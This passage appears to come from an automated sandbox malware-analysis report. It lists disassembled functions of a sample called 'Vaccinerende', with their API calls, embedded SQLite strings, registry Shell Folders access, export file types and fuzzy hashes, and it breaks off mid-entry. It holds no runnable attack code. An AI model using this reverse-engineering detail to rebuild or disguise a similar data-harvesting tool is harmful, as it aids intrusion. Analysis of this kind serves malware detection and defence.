                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: wcscat$_snwprintfmemset
                                            • String ID: %2.2X
                                            • API String ID: 2521778956-791839006
                                            • Opcode ID: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                            • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                            • Opcode Fuzzy Hash: 31c2c2b958cbfb7d79e881a69437bc30ebdfa5a8327fe047e8a0291744cff554
                                            • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                            Function 0040D5D6 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _snwprintfwcscpy
                                            • String ID: dialog_%d$general$menu_%d$strings
                                            • API String ID: 999028693-502967061
                                            • Opcode ID: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                            • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                            • Opcode Fuzzy Hash: 80a89c9967db9934379ab2cd2962a5087f7f7915bf37897dca38dc6723802d56
                                            • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                            Function 00408D96 Relevance: 10.2, APIs: 8, Instructions: 159stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • strlen.MSVCRT ref: 00408DFA
                                              • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                            • memset.MSVCRT ref: 00408E46
                                            • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                            • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                            • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                            • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy$memsetstrlen
                                            • String ID:
                                            • API String ID: 2350177629-0
                                            • Opcode ID: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                            • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                                            • Opcode Fuzzy Hash: 5b01e9cdb19858cbca659f92b0ea30b8779096e26500951ee762ba1ee29ea98e
                                            • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                                            Function 0042ADCD Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 217COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memset
                                            • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                            • API String ID: 2221118986-1606337402
                                            • Opcode ID: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                            • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                                            • Opcode Fuzzy Hash: f99636ea185a13f681f6ed3553038105d2c4243f795332ddfde7f7b33e8689c4
                                            • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                                            Function 00408F2F Relevance: 9.1, APIs: 6, Instructions: 119COMMON
                                            Download Yara Rule
                                            APIs
                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                            • memset.MSVCRT ref: 00408FD4
                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                            • memset.MSVCRT ref: 00409042
                                            • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                              • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcmpmemset$_mbscpymemcpystrlen
                                            • String ID:
                                            • API String ID: 265355444-0
                                            • Opcode ID: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                            • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                                            • Opcode Fuzzy Hash: 28e2d425d257f258de9af60d97ecb42603b9b505b60f53e6cc20d6bda128ffa8
                                            • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                                            Function 0040C3C3 Relevance: 9.1, APIs: 6, Instructions: 109registryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                              • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                              • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                            • memset.MSVCRT ref: 0040C439
                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                            • _wcsupr.MSVCRT ref: 0040C481
                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                            • memset.MSVCRT ref: 0040C4D0
                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                            • String ID:
                                            • API String ID: 4131475296-0
                                            • Opcode ID: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                            • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                            • Opcode Fuzzy Hash: bbad7829663e404974ee36071e77aa52346e6492d823ab1d084cd5c9aca113c0
                                            • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                            Function 004116DD Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 82COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 004116FF
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                            • API String ID: 2618321458-3614832568
                                            • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                            • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                            • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                            • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                            Function 004185CA Relevance: 9.1, APIs: 6, Instructions: 78COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: AttributesFilefreememset
                                            • String ID:
                                            • API String ID: 2507021081-0
                                            • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                            • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                            Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                            Download Yara Rule
                                            APIs
                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                            • malloc.MSVCRT ref: 00417524
                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                            • free.MSVCRT ref: 00417544
                                            • free.MSVCRT ref: 00417562
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                            • String ID:
                                            • API String ID: 4131324427-0
                                            • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                            • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                            Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                            • free.MSVCRT ref: 0041822B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: PathTemp$free
                                            • String ID: %s\etilqs_$etilqs_
                                            • API String ID: 924794160-1420421710
                                            • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                            • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                            Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0040FDD5
                                              • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                            • _snwprintf.MSVCRT ref: 0040FE1F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                            • String ID: <%s>%s</%s>$</item>$<item>
                                            • API String ID: 1775345501-2769808009
                                            • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                            • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                            • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                            • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                            Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • wcscpy.MSVCRT ref: 0041477F
                                            • wcscpy.MSVCRT ref: 0041479A
                                            • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                            • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: wcscpy$CloseCreateFileHandle
                                            • String ID: General
                                            • API String ID: 999786162-26480598
                                            • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                            • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                            • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                            • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                            Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                            • _snwprintf.MSVCRT ref: 0040977D
                                            • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: ErrorLastMessage_snwprintf
                                            • String ID: Error$Error %d: %s
                                            • API String ID: 313946961-1552265934
                                            • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                            • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                            • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                            • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                            Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: foreign key constraint failed$new$oid$old
                                            • API String ID: 0-1953309616
                                            • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                            • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                            • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                            • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                            Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                            • API String ID: 3510742995-272990098
                                            • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                            • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                            Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                            Download Yara Rule
                                            APIs
                                            • memset.MSVCRT ref: 0044A6EB
                                            • memset.MSVCRT ref: 0044A6FB
                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_400000_Vaccinerende.jbxd
                                            Similarity
                                            • API ID: memcpymemset
                                            • String ID: gj
                                            • API String ID: 1297977491-4203073231
                                            • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                            • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                            Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                            • free.MSVCRT ref: 0040E9D3
                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.3452219182.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 0000000C.00000002.3452219182.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                            • Associated: 0000000C.00000002.3452219182.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
